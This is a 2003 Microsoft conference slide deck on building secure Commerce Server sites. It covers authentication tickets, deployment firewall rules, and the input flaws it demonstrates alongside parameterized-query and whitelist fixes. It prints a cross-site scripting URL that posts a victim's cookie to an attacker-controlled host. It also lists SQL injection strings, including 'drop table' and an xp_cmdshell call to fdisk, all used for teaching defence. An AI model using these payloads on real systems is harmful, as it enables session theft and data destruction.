EBZ314 Building Secure Commerce Server Sites Peter Oehlert SDET Yet Huynh SDE E-Business Server Microsoft Corporation


Page 1

EBZ314

Building Secure Commerce Server Sites

Peter Oehlert, SDET
Yet Huynh, SDE
E-Business Server, Microsoft Corporation

Page 2

Agenda

Commerce Authentication System

Secure Site Development

Secure Deployment

Additional Resources

Questions

Page 3

Authentication Components

Authentication Tickets
  Profile Ticket
  Authentication Ticket

Authentication .NET Classes
  Cookie or URL support
  Extended property support

Authentication Filter
  ISAPI filter, requires cookies
  Modes of operation: Windows, Custom, AutoCookie
  Flexible login and helper pages

Page 4

Authentication Tickets

Profile Ticket
  Tracks the anonymous user
  Persistent cookie

Authentication Ticket
  Tracks the authenticated user
  Session cookie

Other features
  Links to the profile object via the UserID stored in the ticket
  Custom properties
  Can also be encoded on the URL by the QueryStringBuilder class

Page 5

AuthManager .NET Class

Manages authentication tickets
  Sets encrypted tickets using a configurable encryption key
  Support for rolling key encryption
  Works in both cookie and cookieless scenarios

Login credential validation left to the developer
  Can use any data source as the credential store

Integration with Data Warehouse

Page 6

AuthManager Scenario (Cookie)

[Sequence diagram. Participants: Browser (IE, Netscape); Application Server running the Inetinfo process, which hosts the ASPX page and the Logon Form built on the Auth .NET class; Profile Service.]

1. Browser: Get Request
2. ASPX page: IsAuthenticated()? or UserId present? No: access is denied, redirect to Login Form
3. Browser submits userID/Password to the Logon Form
4. Redirected to the original request with cookie
5. Browser: Get Request with cookie; the ASPX page gets profile data from the Profile Service
6. Content returned to the Browser

Page 7

Authentication Filter

ISAPI Filter
  Tightly integrated with the AuthManager class
  Exchange 2000 OWA support

Modes of operation
  Windows Authentication (Active Directory)
  Custom Authentication (custom database/profile)
  AutoCookie (allows a mix)

Secures site at the virtual directory
  Requires cookies
  Authentication files located at /<vroot>/Authfiles

Custom branding
  Login.asp HTML form used to submit UserID & Password, not the browser dialog box

Page 8

Windows Authentication

Runs thread under the logged-on user context
  Secure resources using ACLs
  Single sign-on integration with Exchange 2000 OWA

Proxy Account Support
  Granular access control using ACLs
  Configurable
    Can use a single account for all
    Map groups of logins to different proxy accounts

Page 9

Custom Authentication and AutoCookie

Runs thread under the anonymous user account
  Protects site at the vroot level (doesn't use ACLs)
  Allows web farm load balancing: does not require session/server affinity

AutoCookie allows AuthFilter to issue a Profile Ticket to track anonymous users

Page 10

Authentication .NET Enhancements

Thin layer of abstraction over AuthManager COM primary interop assembly

Authentication model remains the same (using tickets with AuthManager alone or with the AuthFilter)

Improved object model

Page 11

Authentication .NET Object Model

[Class diagram; the classes shown are:]
  AuthManager
    AuthTicket: UserID, Properties...
    ProfileTicket: UserID, Properties...
  CookieSupport
    SessionCookieSupport
    PersistentCookieSupport
  AuthenticationInfo
  QueryStringBuilder
  Authentication-specific exception classes

Page 12

Authentication Module

HTTP module added via the web.config (section handler registration, then the module's own section):

<section name="authentication" type="Microsoft.CommerceServer.Runtime.Configuration.CommerceAuthenticationSectionHandler, Microsoft.CommerceServer.Runtime, Version=4.5.2002.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />

<authentication detectCookies="true" />

Creates a per-request instance of AuthenticationInfo, accessed via CommerceContext

Automatic detection of client cookie support

Page 13

.NET Commerce Authentication Module

demo

Yet Huynh, SDE, E-Business Server

Page 14

FAQ

Passport-like single sign-on across multiple sites
  Commerce Authentication supports single sign-on across applications in the same domain and across domains that share at least one domain scope.
  E.g. www.CommerceServer.microsoft.com, www.Office.Microsoft.com, www.Windows.Microsoft.com

Password cache is not encrypted in AuthFilter
  Reading it requires access to the Inetinfo process space.

AuthFilter requires the admin connection string to be a SQL connection string if running IIS 5.x
  The mitigating factor is that the connection string to the admin database is stored encrypted in the registry. Also, this is no longer a limitation with IIS 6.x.

Cookie replay issue with AuthManager
  This is a limitation of all authentication schemes that utilize cookies. A mitigating factor is to use SSL to secure access to the tickets.

Page 15

Agenda

Commerce Authentication System

Secure Site Development

Secure Deployment

Additional Resources

Questions

Page 16

STRIDE Threats

S - Spoofing Identity

T - Tampering with Data

R - Repudiation

I - Information Disclosure

D - Denial of Service

E - Elevation of Privilege

Page 17

Common Web Security Mistakes

All input is evil, until proven otherwise!
  Cross-Site Scripting
  SQL Injection attacks

Page 18

Cross-Site Scripting Issues

This attack has become common
  Compromise the client through a flawed server
  Only takes one flawed page in the domain

The mistake is echoing user input, because the input may be script!

Page 19

CSS (Cross-Site Scripting) – How It Works

The vulnerable page, hello.asp, echoes the query string value straight into the response:

Hello, <% =Request.QueryString("name") %>

A normal request:

http://www.a.com/hello.asp?name=Blake

The Bad URL (the name parameter carries a form and a script that posts the victim's cookie to http://www.b.com/gather.asp, a page the attacker controls):

http://www.a.com/hello.asp?name=<FORM action=http://www.b.com/gather.asp method=post id="idForm"><INPUT name="cookie" type="hidden"></FORM><SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>

Page 20

Trusting Input - A Vulnerable Managed Code Example

using System.Data.SqlClient;
using System.Data.SqlTypes;

// Vulnerable: the caller-supplied company name is concatenated into the SQL text.
// The slide omits the connection; it is passed in here so the method is complete.
public static SqlMoney FreightByCargo(SqlConnection connection, string company) {
    SqlCommand cmd = new SqlCommand();
    cmd.Connection = connection;
    cmd.CommandText = "select sum(cost) as cost " +
                      "from orders " +
                      "where companyname = '" + company + "'";
    return new SqlMoney((decimal)cmd.ExecuteScalar());
}

Page 21

Why It's Wrong (1 of 2)

Good Guy
  Name: Foo Corp
  SELECT sum(cost) FROM orders WHERE companyname='Foo Corp'

Bad Guy
  Name: Blah' or 1=1 --
  SELECT sum(cost) FROM orders WHERE companyname='Blah' or 1=1 -- '

Page 22

Why It's Wrong (2 of 2)

Really Bad Guy
  Name: b' drop table orders --
  SELECT sum(cost) FROM orders WHERE companyname='b' drop table orders -- '

Downright Evil Guy
  Name: b' xp_cmdshell('fdisk.exe') --
  SELECT sum(cost) FROM orders WHERE companyname='b' xp_cmdshell('fdisk.exe') -- '

Page 23

A More Secure Managed Code Example

using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;

// Safer: the company name travels as a typed parameter and is never parsed as SQL.
// Note the trailing space after "as cost"; without it the text reads "costfrom orders".
public static SqlMoney FreightByCargo(SqlConnection connection, string company) {
    SqlCommand cmd = new SqlCommand();
    cmd.Connection = connection;
    cmd.CommandText = "select sum(cost) as cost " +
                      "from orders " +
                      "where companyname = @CompanyName";
    SqlParameter param = cmd.Parameters.Add("@CompanyName", SqlDbType.NVarChar, 40);
    param.Value = company;
    return new SqlMoney((decimal)cmd.ExecuteScalar());
}
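As an added example, not code from the slides or from Commerce Server, the two FreightByCargo patterns translated to Python against an in-memory sqlite3 table with constructed rows, run with the slide's "Blah' or 1=1 --" name. sqlite3 stands in for SQL Server; the drop-table and xp_cmdshell forms from slide 22 are not exercised because they rely on T-SQL batch parsing, which the single-statement SQLite dialect rejects.

```python
import sqlite3

# Constructed rows standing in for the slide's "orders" table.
ORDERS = [("Foo Corp", 100.0), ("Foo Corp", 50.0), ("Bar Ltd", 999.0)]


def make_db():
    """In-memory orders table loaded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (companyname TEXT, cost REAL)")
    conn.executemany("INSERT INTO orders VALUES (?, ?)", ORDERS)
    return conn


def freight_by_cargo_concat(conn, company):
    """The vulnerable slide-20 pattern: caller text is pasted into the SQL string."""
    sql = ("select sum(cost) as cost from orders "
           "where companyname = '" + company + "'")
    return conn.execute(sql).fetchone()[0]


def freight_by_cargo_param(conn, company):
    """The slide-23 fix: the value is bound as a parameter, never parsed as SQL."""
    sql = "select sum(cost) as cost from orders where companyname = ?"
    return conn.execute(sql, (company,)).fetchone()[0]


def compare(company):
    """Return (concatenated result, parameterized result) for one company name."""
    return (freight_by_cargo_concat(make_db(), company),
            freight_by_cargo_param(make_db(), company))


if __name__ == "__main__":
    print(compare("Foo Corp"))          # (150.0, 150.0): both agree on honest input
    print(compare("Blah' or 1=1 --"))   # (1149.0, None): concat sums every row, param matches none
```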

Page 24

Input Remedies

Determine what is valid input and reject everything else
  Use regular expressions

Display user input only after sanitizing it
  Passwords are problematic: escape them using Server.URLEncode or HttpServerUtility.URLEncode

Do not construct ad-hoc SQL queries
  Use parameters or stored procs

NEVER use SA or DBO to log on to SQL Server from any application
  Defeats the least privilege principle
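An added example, not from the slides, applying the first two remedies to the hello.asp echo from slide 19: a regular-expression whitelist decides what a valid name looks like and everything else is rejected, and whatever passes is HTML-encoded before display. The whitelist shape, the "Invalid name." response and the choice of HTML encoding for page output (the slide names URL encoding for passwords placed in URLs, a different context) are this example's assumptions.

```python
import html
import re
from urllib.parse import parse_qs

# Assumed whitelist for the "name" value: letters, digits, spaces, periods,
# apostrophes and hyphens, 1 to 40 characters. Anything else is rejected.
NAME_RE = re.compile(r"[A-Za-z0-9 .'\-]{1,40}")


def validate_name(value):
    """Return the value if it matches the whitelist, otherwise None."""
    return value if NAME_RE.fullmatch(value) else None


def encode_for_html(value):
    """HTML-encode so the browser displays the text instead of parsing it as markup."""
    return html.escape(value, quote=True)


def render_hello_unsafe(query_string):
    """The slide-19 pattern: Hello, <% =Request.QueryString("name") %> with no checks."""
    name = parse_qs(query_string, keep_blank_values=True).get("name", [""])[0]
    return "Hello, " + name


def render_hello(query_string):
    """hello.asp with both remedies: reject bad shapes, encode what is displayed."""
    name = parse_qs(query_string, keep_blank_values=True).get("name", [""])[0]
    if validate_name(name) is None:
        return "<p>Invalid name.</p>"
    return "Hello, " + encode_for_html(name)


if __name__ == "__main__":
    # Constructed probe: a script tag where a name should be (URL-encoded as a browser would send it).
    probe = "name=%3Cscript%3Ealert(1)%3C/script%3E"
    print(render_hello_unsafe(probe))   # markup reaches the page unchanged
    print(render_hello(probe))          # rejected by the whitelist
    print(render_hello("name=O'Neil"))  # allowed, but the apostrophe is encoded
```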

Page 25

Input Testing Ideas

Enumerate all entry points to the app
  Sockets, RPC, pipes, files, registry keys, SOAP params, HTTP headers, form values, querystrings…

Use a tool which goes 'underneath the radar'
  Perl, C#, C++

Lie about the input
  Make it too big, too small, non-existent, wrong data type…

Page 26

Agenda

Commerce Authentication System

Secure Site Development

Secure Deployment

Additional Resources

Questions

Page 27

Securing Your Site

Infrastructure
  Firewall
  Least privilege accounts (SQL, NT services)
  Throttle requests (baskets, checkouts, IIS)

Business Desk Security
  Use NTLM authentication
  Restrict access by module, task, field/property

Admin DB
  Clear text connection strings to Commerce DBs: use Windows Integrated Security for SQL
  SiteConfigReadOnly, SiteConfig, GlobalConfig: restrict executable scripts and components, set ACLs on components

Page 28

Securing Your Site

Commerce DB
  Clear text connection string in the UPM BizData store: use Windows Integrated Security for SQL
  Use an encrypted network connection (SSL, IPSec, multi-protocol)
  Encrypt user passwords, credit cards (UPM Encryption)
  Set rights on DBs, tables, SPs

Log files
  Set ACLs on the log directory
  Use an encrypted network connection (SSL, IPSec)

Strategic Technology Protection Program
  IISLockDown
  URLScan
  HFNetCheck

Page 29

Deployment Architecture

[Network diagram; only the component labels survive extraction: ISA Firewall (four instances), Ethernet switches, Web Server (two) with NLB, SMTP Server, SQL (two) with MSCS, AD (two), DW, Bizdesk (two), MOM. The two firewall boundaries are described on the next two slides.]

Page 30

Firewall: Internet-to-Web

Ingress
  To Web Cluster: Web (80, 443)
  To DNS: DNS (53)

Egress
  From Web Cluster: Web (80, 443)
  From DNS: DNS (53)
  From SMTP: SMTP (25)

Page 31

Firewall: Web-to-Data

Ingress
  From Web to SQL: SQL (1433), DTC (135, 5000-5020*)
  From AD to AD *

Egress
  From SQL to Web: SQL (1433), DTC (135, 5000-5020*)

* See Commerce Secure Deployment Guide

Page 32

Agenda

Commerce Authentication System

Secure Site Development

Secure Deployment

Additional Resources

Questions

Page 33

Resources

Bulletins & hotfixes
  http://www.microsoft.com/security

IISLockDown, URLScan, HFNetCheck
  http://www.microsoft.com/technet/security/tools/tools.asp?frame=true

Online Guides
  Web based security in Commerce Server 2002
  http://www.microsoft.com/technet/prodtechnol/comm/comm2002/maintain/cs02wsec.asp
  Deploying a Secure Commerce Server 2002 Site
  http://www.microsoft.com/technet/prodtechnol/comm/comm2002/deploy/SecCncpt.asp
  Building Secure ASP.NET Applications
  http://msdn.microsoft.com/library/en-us/dnnetsec/html/secnetlpmsdn.asp
  Windows Server 2003 Security Guide
  http://go.microsoft.com/fwlink/?LinkId=14845
  Windows Server 2000 Security Guide
  http://www.microsoft.com/technet/security/prodtech/windows/secwin2k/default.asp
  Product Documentation Refresh
  http://go.microsoft.com/fwlink/?LinkId=6724

Page 34

Suggested Reading And Resources

Microsoft Press books are 20% off at the TechEd Bookstore

Also buy any TWO Microsoft Press books and get a FREE T-Shirt

The tools you need to put technology to work!

TITLE                                                                  | Available
Building Solutions with Microsoft® Commerce Server 2002: 0-7356-1854-  | Today
Writing Secure Code, Second Edition                                    | Today

Page 35

Community Resources

Visit the E-Business MSFT Newsgroups
  BizTalk: http://www.microsoft.com/biztalk/community
  Commerce Server: http://www.microsoft.com/commerceserver/community
  Content Management Server: http://www.microsoft.com/cmserver/community

Share samples at http://www.gotdotnet.com

Page 36

Community Resources

Community Resources
  http://www.microsoft.com/communities/default.mspx

Most Valuable Professional (MVP)
  http://www.mvp.support.microsoft.com/

Newsgroups
  Converse online with Microsoft Newsgroups, including Worldwide
  http://www.microsoft.com/communities/newsgroups/default.mspx

User Groups
  Meet and learn with your peers
  http://www.microsoft.com/communities/usergroups/default.mspx

Page 37

Evaluations

Page 38

© 2003 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.